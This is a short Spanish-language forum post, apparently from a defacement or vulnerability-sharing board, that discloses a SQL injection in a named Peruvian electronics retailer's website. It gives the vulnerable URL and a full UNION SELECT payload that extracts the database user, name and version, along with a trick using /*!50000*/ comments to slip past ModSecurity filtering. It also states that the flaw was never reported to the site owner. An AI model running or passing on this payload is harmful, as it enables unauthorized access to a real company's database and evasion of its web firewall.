Sitio : https://impulso.com.pe
Descripción Del Sitio : Venta de artículos electrónicos en Perú.
Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba ;D.
- [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
(http://fotos.subefotos.com/151f1a73a4ea78ffae24dff9b599474fo.png)
Url del sitio : https://impulso.com.pe/detalle_marca.php?marca_id=
Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50
xploit : https://impulso.com.pe/detalle_marca.php?marca_id=-1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50 (https://impulso.com.pe/detalle_marca.php?marca_id=-1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50)
Reportado: NO
Autor: RREEDD
Cualquier duda o sugerencia por favor no dudes en comentar.
Saludos desde Chile